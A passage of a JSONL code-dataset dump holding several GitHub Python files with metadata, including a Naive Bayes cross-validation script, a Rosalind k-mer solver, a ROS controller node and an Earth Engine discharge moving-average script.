% len(data))\n\n num_of_folds = 3\n fold_size = int(len(data) / num_of_folds)\n\n #training data for 1st fold\n datatrain1 = data[:fold_size]#training data for 1st fold\n\n #calculating the N and Y\n N = len(datatrain1[0]) - 1\n distinct = []\n list = []\n for i in range(len(datatrain1)):\n list.append(datatrain1[i][-1])\n for j in list:\n if j not in distinct:\n distinct.append(j)\n Y = len(distinct)\n\n params = learn(datatrain1, N, Y)\n\n correct = 0\n for obs in data[fold_size:]:# testing data for 1st fold\n result = classify(obs, params, N, Y)\n result = np.array(result) / np.sum(result)\n if np.argmax(result) == obs[-1]:\n correct += 1\n accuracy1 = (correct / (len(data)-fold_size)) * 100\n print('Accuracy after 1nd fold: %.3f%%' % accuracy1)\n\n #for training 2nd fold\n datatrain2 = data[fold_size:(len(data) - fold_size)]\n\n params = learn(datatrain2, N, Y)\n\n #for testing\n correct = 0\n for obs in data[:fold_size]:#testing data for 2nd fold\n result = classify(obs, params, N, Y)\n result = np.array(result) / np.sum(result)\n if np.argmax(result) == obs[-1]:\n correct += 1\n for obs in data[2*fold_size:]:\n result = classify(obs, params, N, Y)\n result = np.array(result) / np.sum(result)\n if np.argmax(result) == obs[-1]:\n correct += 1\n\n accuracy2 = (correct/(len(data)-fold_size))*100\n print('Accuracy after 2nd fold: %.3f%%' % accuracy2)\n\n #for training for 3rd fold\n datatrain3 = data[2*fold_size:]\n\n params = learn(datatrain3, N, Y)\n\n #for testing for 3rd fold\n correct = 0\n for obs in data[:2*fold_size]:#testing data 3rd fold\n result = classify(obs, params, N, Y)\n result = np.array(result) / np.sum(result)\n if np.argmax(result) == obs[-1]:\n correct += 1\n\n accuracy3 = (correct/(len(data)-fold_size))*100\n print('Accuracy after 3nd fold: %.3f%%' % accuracy3)\n\n print('Mean is: %.3f%%'% ((accuracy1+accuracy2+accuracy3)/3))\n majority_value = majority(data)\n print('Majority baseline of dataset is: %.3f%% '% majority_value)\n\nif __name__ == '__main__':\n demo()\n\n\n\n","repo_name":"am6180/Decision-Tree-Naive-Bayes-algorithms","sub_path":"NaiveBayes.py","file_name":"NaiveBayes.py","file_ext":"py","file_size_in_byte":3482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"3126085302","text":"import math\ndef main():\n print(\"This program calculates the length of a ladder required\")\n print(\"to reach a given height while leaned against a house.\")\n print()\n print(\"Please enter the height (in m) and angle (in degrees) of the ladder.\")\n height = eval(input(\"Enter height: \"))\n angle = eval(input(\"Enter angle: \"))\n pi = 3.141592653589793\n angle_radians = (pi/180)*angle\n length = height/math.sin(angle_radians)\n\n print(\"The length of the ladder has to be\", length, \"m.\")\nmain()\n","repo_name":"lilu069/hw070172","sub_path":"L04/exercises_zelle/3_10.py","file_name":"3_10.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"11961428026","text":"# Frequent Words with Mismatches and Reverse Complements Problem\n#\n# Find the most frequent k-mers (with mismatches and reverse complements) in a DNA string.\n#\n# Given: A DNA string Text as well as integers k and d.\n#\n# Return: All k-mers Pattern maximizing the sum Countd(Text, Pattern) + Countd(Text, Pattern) over all possible k-mers.\n\n# Sample Dataset\n#\n# ACGTTGCATGTCGCATGATGCATGAGAGCT\n# 4 1\n\n# Sample Output\n#\n# ATGT ACAT\n\n\nimport 
inout \t# my module for handling Rosalind's file I/O\nsequence = inout.infilelines[0].strip()\nk, d = map(int, inout.infilelines[1].strip().split())\n\ncomplement = { 'A': 'T', 'C': 'G', 'G': 'C', 'T': 'A'}\ndef reverse_complement(kmer):\n\tr = ''\n\tfor base in kmer:\n\t\tr = complement[base] + r\n\treturn r\n\ndef enumerate_mismatches (kmer, maxdist):\n\tif maxdist == 0:\n\t\treturn [kmer]\n\telse:\n\t\tr = []\n\t\tfor m_kmer in enumerate_mismatches(kmer, maxdist - 1):\n\t\t\tfor loc in range(k):\n\t\t\t\tfor base in ['A', 'C', 'G', 'T']:\n\t\t\t\t\tnew_kmer = m_kmer[:loc] + base + m_kmer[loc + 1:]\n\t\t\t\t\tr.append(new_kmer)\n\t\treturn set(r)\n\nkmer_counts = {}\nmax_kmers = []\nmax_kmer_count = 0\nfor idx in range(len(sequence) - k + 1):\n\tkmer = sequence[idx:idx+k]\n\tm_kmers = list(enumerate_mismatches(kmer, d))\n\tm_kmers.extend(list(enumerate_mismatches(reverse_complement(kmer), d)))\n\tfor m_kmer in m_kmers:\n\t\tif m_kmer in kmer_counts:\n\t\t\tcount = kmer_counts[m_kmer] + 1\n\t\telse:\n\t\t\tcount = 1\n\t\tkmer_counts[m_kmer] = count\n\n\t\tif count > max_kmer_count:\n\t\t\tmax_kmer_count = count\n\t\t\tmax_kmers = [m_kmer]\n\t\telif count == max_kmer_count:\n\t\t\tmax_kmers.append(m_kmer)\n\ninout.output(' '.join(max_kmers))\n","repo_name":"jmthibault79/rosalind","sub_path":"textbook/1H.py","file_name":"1H.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"54"} +{"seq_id":"14776929908","text":"import rospy\n\nfrom tf.transformations import euler_from_quaternion\n\nfrom nav_msgs.msg import OccupancyGrid\nfrom geometry_msgs.msg import PoseWithCovarianceStamped\nfrom geometry_msgs.msg import PoseStamped\nfrom visualization_msgs.msg import Marker\nfrom visualization_msgs.msg import MarkerArray\n\nfrom mcc.msg import *\nfrom mcc.srv import *\n\nimport math\nimport random\nimport itertools as it\nimport ctypes as ct\nimport numpy as np\n\nimport time\n\nfrom mcc_model import *\nfrom fsc import *\n\n\nMCC_OCCUPANCY_GRID_OBSTACLE_THRESHOLD = 50\nMCC_GOAL_THRESHOLD = 0.001\n\n\nclass MCCExec(object):\n \"\"\" The code which controls the robot following an MCC model's FSC. \"\"\"\n\n def __init__(self, gameType, agent, numNodes, slack):\n \"\"\" The constructor for the MCCExec class.\n\n Parameters:\n gameType -- The type of game: \"Prisoner Meeting\" or \"Battle Meeting\".\n agent -- The unique agent name from the MCC.\n numNodes -- The number of controller nodes.\n slack -- The amount of slack.\n \"\"\"\n\n # The MCC and other related information. Note: These are for *this* agent.\n self.mcc = MCC(gameType)\n self.fsc = None\n self.fscState = None\n self.agent = agent\n\n self.numNodes = numNodes\n self.slack = slack\n\n self.algorithmIsInitialized = False\n\n # Information about the map for use by a path follower once our paths are published.\n self.mapWidth = 0\n self.mapHeight = 0\n self.mapOriginX = 0.0\n self.mapOriginY = 0.0\n self.mapResolution = 1.0\n\n # This is the number of x and y states that will be created using the map. Obstacle states\n # will, of course, be omitted.\n self.gridWidth = rospy.get_param(rospy.search_param('grid_width'))\n self.gridHeight = rospy.get_param(rospy.search_param('grid_height'))\n\n # Store if we performed the initial theta adjustment and the final goal theta adjustment\n self.performedInitialPoseAdjustment = False\n self.initialPoseAdjustmentTheta = 0.0\n\n # Subscribers, publishers, services, etc. 
for ROS messages.\n self.subOccupancyGrid = None\n self.subMapPoseEstimate = None\n self.subMapNavGoal = None\n\n self.occupancyGridMsg = None\n self.mapPoseEstimateMsg = None\n self.mapNavGoalMsg = None\n\n self.pubModelUpdate = None\n self.srvGetAction = None\n self.srvGetFSCState = None\n self.srvUpdateFSC = None\n\n def __del__(self):\n \"\"\" The deconstructor for the MCCExec class. \"\"\"\n\n if self.algorithmIsInitialized:\n self.uninitializeAlgorithm()\n\n def initialize(self):\n \"\"\" Initialize the MCCExec class, mainly registering subscribers and services. \"\"\"\n\n subOccupancyGridTopic = rospy.get_param(rospy.search_param('sub_occupancy_grid'))\n self.subOccupancyGrid = rospy.Subscriber(subOccupancyGridTopic,\n OccupancyGrid,\n self.sub_occupancy_grid)\n\n subMapPoseEstimateTopic = rospy.get_param(rospy.search_param('sub_map_pose_estimate'))\n self.subMapPoseEstimate = rospy.Subscriber(subMapPoseEstimateTopic,\n PoseWithCovarianceStamped,\n self.sub_map_pose_estimate)\n\n subMapNavGoalTopic = rospy.get_param(rospy.search_param('sub_map_nav_goal'))\n self.subMapNavGoal = rospy.Subscriber(subMapNavGoalTopic,\n PoseStamped,\n self.sub_map_nav_goal)\n\n pubModelUpdateTopic = rospy.get_param(rospy.search_param('model_update'))\n self.pubModelUpdate = rospy.Publisher(pubModelUpdateTopic, ModelUpdate, queue_size=10)\n\n srvGetActionTopic = rospy.get_param(rospy.search_param('get_action'))\n self.srvGetAction = rospy.Service(srvGetActionTopic,\n GetAction,\n self.srv_get_action)\n\n srvGetFSCStateTopic = rospy.get_param(rospy.search_param('get_fsc_state'))\n self.srvGetFSCState = rospy.Service(srvGetFSCStateTopic,\n GetFSCState,\n self.srv_get_fsc_state)\n\n srvUpdateFSCTopic = rospy.get_param(rospy.search_param('update_fsc'))\n self.srvUpdateFSC = rospy.Service(srvUpdateFSCTopic,\n UpdateFSC,\n self.srv_update_fsc)\n\n def update(self):\n \"\"\" Update the MCCExec object. \"\"\"\n\n # These methods deal with the threading issue. Basically, the update below could be called\n # while the MCC itself is being modified in a different thread. This can easily be reproduced\n # by continually assigning new initial pose estimates and goals. Instead, however, we have\n # any subscriber callbacks assign a variable with the message. This message is then handled\n # as part of the main node's thread update call (here).\n self.handle_occupancy_grid_message()\n self.handle_map_pose_estimate_msg()\n self.handle_map_nav_goal_msg()\n\n # We only update once we have a valid MCC.\n if self.mcc is None or self.fscState is None:\n return\n\n # If this is the first time the MCC has been ready to be updated, then\n # initialize necessary variables.\n if not self.algorithmIsInitialized:\n self.initialize_algorithm()\n\n #rospy.loginfo(\"Info[MCCExec.update]: Updating the policy.\")\n\n # Note: There is no update anymore. It is solved offline...\n #result = self.mcc.update()\n\n def initialize_algorithm(self):\n \"\"\" Initialize the MCC algorithm. 
\"\"\"\n\n if self.algorithmIsInitialized:\n rospy.logwarn(\"Warn[MCCExec.initialize_algorithm]: Algorithm is already initialized.\")\n return\n\n rospy.loginfo(\"Info[MCCExec.initialize_algorithm]: Initializing the algorithm.\")\n\n # Load the policy once the initial pose of the agent is prepared.\n self.fsc = FSC(self.mcc, self.agent, self.numNodes)\n self.fsc.load(\"%i_%i\" % (self.numNodes, self.slack))\n self.fscState = self.fsc.get_initial_state()\n\n self.algorithmIsInitialized = True\n\n def uninitialize_algorithm(self):\n \"\"\" Uninitialize the MCC algorithm. \"\"\"\n\n if not self.algorithmIsInitialized:\n rospy.logwarn(\"Warn[MCCExec.uninitialize_algorithm]: Algorithm has not been initialized.\")\n return\n\n rospy.loginfo(\"Info[MCCExec.uninitialize_algorithm]: Uninitializing the algorithm.\")\n\n self.fsc = None\n self.fscState = None\n\n self.algorithmIsInitialized = False\n\n def sub_occupancy_grid(self, msg):\n \"\"\" A subscriber for OccupancyGrid messages. This converges any 2d map\n into a set of MCC states. This is a static method to work as a ROS callback.\n\n Parameters:\n msg -- The OccupancyGrid message data.\n \"\"\"\n\n if self.occupancyGridMsg is None:\n self.occupancyGridMsg = msg\n\n def handle_occupancy_grid_message(self):\n \"\"\" A handler for OccupancyGrid messages. This converges any 2d map\n into a set of MCC states. This is a static method to work as a ROS callback.\n \"\"\"\n\n if self.occupancyGridMsg is None:\n return\n msg = self.occupancyGridMsg\n\n rospy.loginfo(\"Info[MCCExec.sub_occupancy_grid]: Received map. Creating a new MCC.\")\n\n # Remember map information.\n self.mapWidth = msg.info.width\n self.mapHeight = msg.info.height\n self.mapOriginX = msg.info.origin.position.x\n self.mapOriginY = msg.info.origin.position.y\n self.mapResolution = msg.info.resolution\n\n xStep = int(self.mapWidth / self.gridWidth)\n yStep = int(self.mapHeight / self.gridHeight)\n\n # Un-/Re-initialize other helpful variables.\n if self.algorithmIsInitialized:\n self.uninitialize_algorithm()\n\n self.occupancyGridMsg = None\n\n self.pubModelUpdate.publish(ModelUpdate())\n\n def sub_map_pose_estimate(self, msg):\n \"\"\" A subscriber for PoseWithCovarianceStamped messages. This is when an initial\n pose is assigned, inducing an initial FSC State. This is a static method to work as a\n ROS callback.\n\n Parameters:\n msg -- The PoseWithCovarianceStamped message data.\n \"\"\"\n\n if self.mapPoseEstimateMsg is None:\n self.mapPoseEstimateMsg = msg\n\n def handle_map_pose_estimate_msg(self):\n \"\"\" A handler for PoseWithCovarianceStamped messages. This is when an initial\n pose is assigned, inducing an initial FSC state. This is a static method to work as a\n ROS callback.\n \"\"\"\n\n if self.mapPoseEstimateMsg is None:\n return\n msg = self.mapPoseEstimateMsg\n\n if self.mcc is None:\n rospy.logwarn(\"Warn[MCCExec.sub_map_pose_estimate]: MCC has not yet been defined.\")\n return\n\n rospy.loginfo(\"Info[MCCExec.sub_map_pose_estimate]: Received pose estimate. 
Assigning MCC initial FSC state.\")\n\n # Setup the initial (theta) pose adjustment.\n roll, pitch, yaw = euler_from_quaternion([msg.pose.pose.orientation.x,\n msg.pose.pose.orientation.y,\n msg.pose.pose.orientation.z,\n msg.pose.pose.orientation.w])\n self.initialPoseAdjustmentTheta = -yaw\n\n self.performedInitialPoseAdjustment = False\n\n self.uninitialize_algorithm()\n self.initialize_algorithm()\n\n self.mapPoseEstimateMsg = None\n\n self.pubModelUpdate.publish(ModelUpdate())\n\n def sub_map_nav_goal(self, msg):\n \"\"\" A subscriber for PoseStamped messages. This is called when a goal is provided,\n assigning the rewards for the MCC. This is a static method to work as a ROS callback.\n\n Parameters:\n msg -- The OccupancyGrid message data.\n \"\"\"\n\n # TODO: We do not set nav goals in this project.\n #if self.mapNavGoalMsg is None:\n # self.mapNavGoalMsg = msg\n\n def handle_map_nav_goal_msg(self):\n \"\"\" A handler for PoseStamped messages. This is called when a goal is provided,\n assigning the rewards for the MCC. This is a static method to work as a ROS callback.\n \"\"\"\n\n if self.mapNavGoalMsg is None:\n return\n msg = self.mapNavGoalMsg\n\n if self.mcc is None:\n rospy.logwarn(\"Warn[MCCExec.sub_map_nav_goal]: MCC has not yet been defined.\")\n return\n\n self.uninitialize_algorithm()\n self.initialize_algorithm()\n\n self.mapNavGoalMsg = None\n\n self.pubModelUpdate.publish(ModelUpdate())\n\n def srv_get_action(self, req):\n \"\"\" This service returns an action based on the current FSC state, provided enough updates were done.\n\n Parameters:\n req -- The service request as part of GetAction.\n\n Returns:\n The service response as part of GetAction.\n \"\"\"\n\n if self.mcc is None or self.fscState is None:\n rospy.logerr(\"Error[MCCExec.srv_get_action]: MCC or FSC state are undefined.\")\n return GetActionResponse(False, 0.0, 0.0, 0.0)\n\n # Randomly select an action following the stochastic FSC.\n action = self.fsc.get_action(self.fscState)\n\n rospy.loginfo(\"Info[MCCExec.srv_get_action]: Agent '%s' has selected action '%s'.\" % (self.agent, str(action)))\n\n # The relative goal is simply the relative location based on the \"grid-ize-ation\"\n # and resolution of the map. The goal theta is a bit harder to compute (estimate).\n goalX, goalY = action\n\n # TODO: Special: Flip the y axis...\n goalY = -goalY\n\n xSize = self.mapWidth / self.gridWidth\n ySize = self.mapHeight / self.gridHeight\n\n goalX *= xSize * self.mapResolution\n goalY *= ySize * self.mapResolution\n\n # If this is the first action we take, then we need to offset the goalX and goalY\n # as well as assign a goalTheta to properly setup the initial motion. 
Otherwise,\n # the adjustment required is simply 0; the path (action) follower will handle this.\n if not self.performedInitialPoseAdjustment:\n #goalX += self.initialPoseAdjustmentX\n #goalY += self.initialPoseAdjustmentY\n goalTheta = self.initialPoseAdjustmentTheta\n self.performedInitialPoseAdjustment = True\n else:\n goalTheta = 0.0\n\n return GetActionResponse(True, goalX, goalY, goalTheta)\n\n def srv_get_fsc_state(self, req):\n \"\"\" This service returns the current FSC state.\n\n Parameters:\n req -- The service request as part of GetFSCState.\n\n Returns:\n The service response as part of GetFSCState.\n \"\"\"\n\n if self.mcc is None or self.fscState is None:\n rospy.logerr(\"Error[MCCExec.srv_get_fsc_state]: MCC or FSC state are undefined.\")\n return GetFSCStateResponse(\"\")\n\n # Print the FSC states for debug purposes.\n #rospy.loginfo(\"Info[MCCExec.srv_get_fsc_state]: Agent '%s' has FSC state '%s'.\" % (self.agent, self.fscState))\n\n return GetFSCStateResponse(str(self.fscState))\n\n def srv_update_fsc(self, req):\n \"\"\" This service updates the FSC based on a given action and observation.\n\n Parameters:\n req -- The service request as part of UpdateFSC.\n\n Returns:\n The service response as part of UpdateFSC.\n \"\"\"\n\n if self.mcc is None or self.fscState is None:\n rospy.logerr(\"Error[MCCExec.srv_update_fsc]: MCC or FSC state are undefined.\")\n return UpdateFSCResponse(False)\n\n # Determine which action corresponds to this goal. Do the same for the observation.\n actionX = int(np.sign(req.goal_x) * float(abs(req.goal_x) > MCC_GOAL_THRESHOLD))\n actionY = int(np.sign(req.goal_y) * float(abs(req.goal_y) > MCC_GOAL_THRESHOLD))\n action = (actionX, actionY)\n\n try:\n actionIndex = self.mcc.action_factor.index(action)\n except ValueError:\n rospy.logerr(\"Error[MCCExec.srv_update_fsc]: Invalid action given: [%i, %i].\" % (actionX, actionY))\n return UpdateFSCResponse(False)\n\n # Determine which observation corresponds to the request data.\n observation = req.bump_observed\n\n try:\n observationIndex = self.mcc.observation_factor.index(observation)\n except ValueError:\n rospy.logerr(\"Error[MCCExec.srv_update_fsc]: Invalid observation given: %s.\" % (str(req.bump_observed)))\n return UpdateFSCResponse(False)\n\n # Update the FSC state by randomly selecting a successor FSC state.\n self.fscState = self.fsc.get_successor(self.fscState, action, observation)\n\n rospy.loginfo(\"Info[MCCExec.srv_update_fsc]: Agent '%s' has selected successor FSC state '%s'.\" % (self.agent, str(self.fscState)))\n\n return UpdateFSCResponse(True)\n\n\n","repo_name":"kylewray/ccp","sub_path":"src/mcc/scripts/mcc_package/mcc_exec.py","file_name":"mcc_exec.py","file_ext":"py","file_size_in_byte":15544,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"9802565895","text":"\n# coding: utf-8\n\n# # Y2018M02D27_RH_Moving_Average_Discharge_EE_V01\n# \n# * Purpose of script: Moving average for discharge at basin resolution. The script will calculate the volumetric and flux 10 year moving average at a Pfaf6 basin level for total demand. 
(potentially also per sector demand)\n# \n# * Script exports to: \n# * Update this projects/WRI-Aquaduct/PCRGlobWB20V07/global_historical_PTotWW_month_m_pfaf06_1960_2014_movingaverage_10y_V01\n# * Update this projects/WRI-Aquaduct/PCRGlobWB20V07/global_historical_PTotWN_month_m_pfaf06_1960_2014_movingaverage_10y_V01\n# * Kernel used: python35\n# * Date created: 20170301\n# \n# The imageCollection global_historical_availableriverdischarge_month_millionm3_5minPfaf6_1960_2014 (output of script: Y2017M12D07_RH_ZonalStats_MaxQ_toImage_EE_V01) contains three bands: \n# \n# 1. zones_mode_pfaf6 \n# 1. sum. sum is the sum of the discharge in millionm3 at the q_search_mask (output of Y2017M12D06_RH_Conservative_Basin_Sinks_EE_V01). q_search_mask is FAmax-1 expect when endorheic or sinks\n# 1. max. global maximum of Q within basin. \n# \n# \n# \n# Methodology to apply. \n# \n# \n# if qmax < 1.25 qsum: \n# q = qmax \n# else: \n# q = qsum \n# \n# Can be optimized. Options include: Use flow accumulation instead of discharge\n# Use multiple level FAmax FAmax-1 FAmax-2 etc. \n# \n# \n# Known issues: \n# When the most downstream pixel is a lake, the blue water available of the lake is available to the entire sub-basin. For example pfaf_id 434210\n# \n# Sub-basins which have only one discharge cell of the main river: e.g. 142739 (Famale, Niger)\n# \n\n# In[1]:\n\nimport time, datetime, sys\ndateString = time.strftime(\"Y%YM%mD%d\")\ntimeString = time.strftime(\"UTC %H:%M\")\nstart = datetime.datetime.now()\nprint(dateString,timeString)\nsys.version\n\n\n# In[2]:\n\nSCRIPT_NAME = \"Y2018M02D27_RH_Moving_Average_Discharge_EE_V01\"\n\nCRS = \"EPSG:4326\"\n\nEE_PATH = \"projects/WRI-Aquaduct/PCRGlobWB20V07\"\n\nOUTPUT_VERSION = 2\n\nDIMENSION5MIN = {}\nDIMENSION5MIN[\"x\"] = 4320\nDIMENSION5MIN[\"y\"] = 2160\n\n\nMA_WINDOW_LENGTH = 10 # Moving average window length. 
\n\nTESTING = 0\n\nTHRESHOLD = 1.25\n\nPFAF_LEVEL = 6\n\nDIMENSIONS30SSMALL = \"43200x19440\"\nCRS_TRANSFORM30S_SMALL = [0.008333333333333333, 0.0, -180.0, 0.0, -0.008333333333333333, 81.0]\n\n\n# In[3]:\n\nimport ee\nimport os\nimport logging\nimport pandas as pd\nimport subprocess\n\n\n# In[4]:\n\nee.Initialize()\n\n\n# In[5]:\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\nformatter = logging.Formatter('%(asctime)s:%(levelname)s:%(message)s')\nfile_handler = logging.FileHandler(\"./logs/%sV%0.2d.log\" %(SCRIPT_NAME,OUTPUT_VERSION))\nfile_handler.setFormatter(formatter)\nlogger.addHandler(file_handler)\n\n\n# In[6]:\n\ngeometry = ee.Geometry.Polygon(coords=[[-180.0, -90.0], [180, -90.0], [180, 90], [-180,90]], proj= ee.Projection('EPSG:4326'),geodesic=False )\n\n\n# In[7]:\n\ngeometrySmall = ee.Geometry.Polygon(coords=[[-180.0, -81.0], [180, -81.0], [180, 81], [-180,81]], proj= ee.Projection('EPSG:4326'),geodesic=False )\n\n\n# In[8]:\n\narea30s = ee.Image(\"projects/WRI-Aquaduct/PCRGlobWB20V07/area_30s_m2V11\")\nzones30s = ee.Image(\"projects/WRI-Aquaduct/PCRGlobWB20V07/hybas_lev00_v1c_merged_fiona_30s_V01\")\nzones30s = zones30s.divide(ee.Number(10).pow(ee.Number(12).subtract(PFAF_LEVEL))).floor().toInt64();\n\ncrs30s = area30s.projection()\n\narea30s_pfaf06 = ee.Image(\"projects/WRI-Aquaduct/PCRGlobWB20V07/area_30spfaf06_m2_V01V01\").select([\"sum\"])\n\nscale30s = zones30s.projection().nominalScale().getInfo()\n\n\n# In[9]:\n\n\"\"\"\ncrsTransform5min = [\n 0.0833333309780367,\n 0,\n -179.99999491255934,\n 0,\n -0.0833333309780367,\n 90.00000254430942\n ]\n\"\"\"\n\n\n# In[10]:\n\ndef prepare_discharge_collection(image):\n \"\"\" find the available discharge based on max and sum bands of available discharge\n \n if qmax =< threshold (1.25) qsum:\n q = qmax\n else:\n q = qsum\n \n Args:\n i_in (ee.Image) :image of available discharge with three bands: zones, max and sum\n \n Returns:\n i_q_out (ee.Image) : image with only one band 'b1'\n \n \n \"\"\"\n\n\n i_q_max = image.select([\"max\"]) \n i_q_sum = image.select([\"sum\"])\n \n i_ratio_q = i_q_max.divide(i_q_sum)\n \n use_max = i_ratio_q.lte(THRESHOLD)\n use_sum = i_ratio_q.gt(THRESHOLD)\n \n i_q_out = use_max.multiply(i_q_max).add((use_sum.multiply(i_q_sum)))\n i_q_out = i_q_out.select([\"max\"],[\"b1\"]) \n i_q_out = i_q_out.copyProperties(image) \n \n return i_q_out\n\n\n\ndef create_collection(assetid):\n \"\"\" Create image collection in earth engine asset folder\n \n This function will only work if the folder in which the\n new imageCollection will be created is valid\n \n \n Args:\n assetid (string) : asset id for the new image collection\n \n Returns: \n result (string) : captured message from command line\n \n \"\"\" \n \n command = \"earthengine create collection {}\".format(assetid) \n result = subprocess.check_output(command,shell=True)\n if result:\n logger.error(result)\n return result \n\n\ndef moving_average_decade(year,ic):\n \"\"\" Calculate a 10 year moving average\n \n This function is limited to one input paramater to allow mapping over a simple list. \n Averages the 10 year up to the input year. 
(]\n \n Global variables required include an imageCollection with a year property.\n \n \n Args:\n year (integer) : final year of interest.\n ic (ee.ImageCollection) : input imageCollection\n \n Returns: \n image (ee.Image) : earth engine image with the mean of the last 10 years\n \"\"\"\n \n min_year = year - MA_WINDOW_LENGTH\n \n ic_filtered = (ic.filter(ee.Filter.gt(\"year\",min_year))\n .filter(ee.Filter.lte(\"year\",year)))\n \n i_mean = ic_filtered.reduce(ee.Reducer.mean()) \n \n \n i_mean = i_mean.copyProperties(source=ic_filtered.first(),\n exclude=[\"script_used\",\n \"output_version\",\n \"year\",\n \"output_version\",\n \"version\",\n \"reducer\",\n \"description\"])\n \n return ee.Image(i_mean)\n\n\ndef mapList(results, key):\n newResult = results.map(lambda x: ee.Dictionary(x).get(key))\n return newResult\n\ndef ensure_default_properties(obj): \n obj = ee.Dictionary(obj)\n default_properties = ee.Dictionary({\"mean\": -9999,\"count\": -9999})\n return default_properties.combine(obj)\n\n\ndef zonal_stats_to_raster(image,zonesImage,geometry,maxPixels,reducerType,scale):\n \"\"\" Zonal statistics using rasterized zones\n \n Args:\n image (ee.Image) : input image with values (Check the units)\n zonesImage (ee.Image) : integer image with the zones\n geometry (ee.Geometry) : geometry indicating the extent of the calculation. Note if geometry is geodesic\n maxPixels (integer) : maximum numbers of pixels within geometry\n reducerType (string) : options include 'mean', 'max', 'sum', 'first' en 'mode' \n \n \n \n # reducertype can be mean, max, sum, first. Count is always included for QA\n # the resolution of the zonesimage is used for scale\n \"\"\"\n \n reducer = ee.Algorithms.If(ee.Algorithms.IsEqual(reducerType,\"mean\"),ee.Reducer.mean(),\n ee.Algorithms.If(ee.Algorithms.IsEqual(reducerType,\"max\"),ee.Reducer.max(),\n ee.Algorithms.If(ee.Algorithms.IsEqual(reducerType,\"sum\"),ee.Reducer.sum(),\n ee.Algorithms.If(ee.Algorithms.IsEqual(reducerType,\"first\"),ee.Reducer.first(),\n ee.Algorithms.If(ee.Algorithms.IsEqual(reducerType,\"mode\"),ee.Reducer.mode(),\"error\"))))\n )\n reducer = ee.Reducer(reducer).combine(reducer2= ee.Reducer.count(), sharedInputs= True).group(groupField=1, groupName=\"zones\") \n\n \n zonesImage = zonesImage.select(zonesImage.bandNames(),[\"zones\"])\n\n totalImage = ee.Image(image).addBands(zonesImage)\n resultsList = ee.List(totalImage.reduceRegion(\n geometry= geometry, \n reducer= reducer,\n scale= scale,\n maxPixels=maxPixels,\n bestEffort =True\n ).get(\"groups\"))\n\n resultsList = resultsList.map(ensure_default_properties); \n zoneList = mapList(resultsList, 'zones');\n countList = mapList(resultsList, 'count');\n valueList = mapList(resultsList, reducerType);\n\n valueImage = zonesImage.remap(zoneList, valueList).select([\"remapped\"],[reducerType])\n countImage = zonesImage.remap(zoneList, countList).select([\"remapped\"],[\"count\"])\n newImage = zonesImage.addBands(countImage).addBands(valueImage)\n return newImage\n\n\ndef set_properties(image):\n \"\"\" Set properties to image based on rows in pandas dataframe\n \n Args:\n image (ee.Image) : image without properties\n \n Returns:\n image_out (ee.Image) : image with properties\n \"\"\"\n \n properties ={}\n properties[\"year\"] = row[\"year\"]\n properties[\"month\"] = row[\"month\"]\n properties[\"units\"] = \"millionm3\"\n properties[\"moving_average_length\"] = MA_WINDOW_LENGTH\n properties[\"moving_average_year_min\"] = row[\"year\"]- (MA_WINDOW_LENGTH-1)\n properties[\"script_used\"] = 
SCRIPT_NAME\n properties[\"indicator\"] = row[\"indicator\"]\n properties[\"version\"] = OUTPUT_VERSION\n properties[\"spatial_resolution\"] = \"30s\"\n properties[\"exportdescription\"] = row[\"exportdescription\"]\n \n image_out = ee.Image(image).set(properties)\n return image_out\n\n\ndef export_asset(image):\n \"\"\" Export a google earth engine image to an asset folder\n \n function will start a new task. To view the status of the task\n check the javascript API or query tasks script. Function is used \n as mapped function so other arguments need to be set globally. \n \n Args:\n image (ee.Image) : Image to export\n \n Returns:\n asset_id (string) : asset id of \n \"\"\"\n \n asset_id = row[\"output_i_assetid\"]\n task = ee.batch.Export.image.toAsset(\n image = ee.Image(image),\n description = \"{}V{}\".format(row[\"exportdescription\"],OUTPUT_VERSION),\n assetId = asset_id,\n dimensions = DIMENSIONS30SSMALL,\n crs = CRS,\n crsTransform = CRS_TRANSFORM30S_SMALL,\n maxPixels = 1e10 \n )\n task.start()\n return asset_id\n\n\n\n\n# In[11]:\n\narea30sPfaf6 = zonal_stats_to_raster(area30s,zones30s,geometrySmall,1e10,\"sum\",scale30s)\n\n\n# In[12]:\n\narea30sPfaf6_m2 = area30sPfaf6.select([\"sum\"]) # image at 30s with area in m^2 per basin\n\n\n# In[13]:\n\nmonths = range(1,13)\nyears = range(1960+9,2014+1)\nindicators = [\"availabledischarge\"]\n\n\n# In[14]:\n\ndf = pd.DataFrame()\nfor indicator in indicators:\n for month in months:\n for year in years:\n newRow = {}\n newRow[\"month\"] = month\n newRow[\"year\"] = year\n newRow[\"output_ic_filename\"] = \"global_historical_{}_month_millionm3_pfaf06_1960_2014_movingaverage_10y_V{:02.0f}\".format(indicator,OUTPUT_VERSION)\n newRow[\"output_ic_assetid\"] = \"{}/{}\".format(EE_PATH,newRow[\"output_ic_filename\"])\n newRow[\"output_i_filename\"] = \"global_historical_{}_month_millionm3_pfaf06_Y{:04.0f}M{:02.0f}_movingaverage_10y_V{:02.0f}\".format(indicator,year,month,OUTPUT_VERSION)\n newRow[\"output_i_assetid\"] = \"{}/{}\".format(newRow[\"output_ic_assetid\"],newRow[\"output_i_filename\"])\n newRow[\"indicator\"] = indicator\n newRow[\"exportdescription\"] = \"{}_month_Y{:04.0f}M{:02.0f}_movingaverage_10y\".format(indicator,year,month)\n df= df.append(newRow,ignore_index=True)\n\n\n# In[15]:\n\ndf.head()\n\n\n# In[16]:\n\nif TESTING:\n df = df[0:1]\n\n\n# In[17]:\n\ndf.shape\n\n\n# In[18]:\n\nfor output_ic_assetid in df[\"output_ic_assetid\"].unique():\n result = create_collection(output_ic_assetid)\n print(result)\n\n\n# In[19]:\n\nfunction_time_start = datetime.datetime.now()\nfor index, row in df.iterrows(): \n ic = ee.ImageCollection(\"{}/global_historical_availableriverdischarge_month_millionm3_5minPfaf6_1960_2014\".format(EE_PATH))\n ic_month = ic.filter(ee.Filter.eq(\"month\",row[\"month\"]))\n \n ic_month_simplified = ic_month.map(prepare_discharge_collection)\n i_mean = moving_average_decade(row[\"year\"],ic_month_simplified)\n 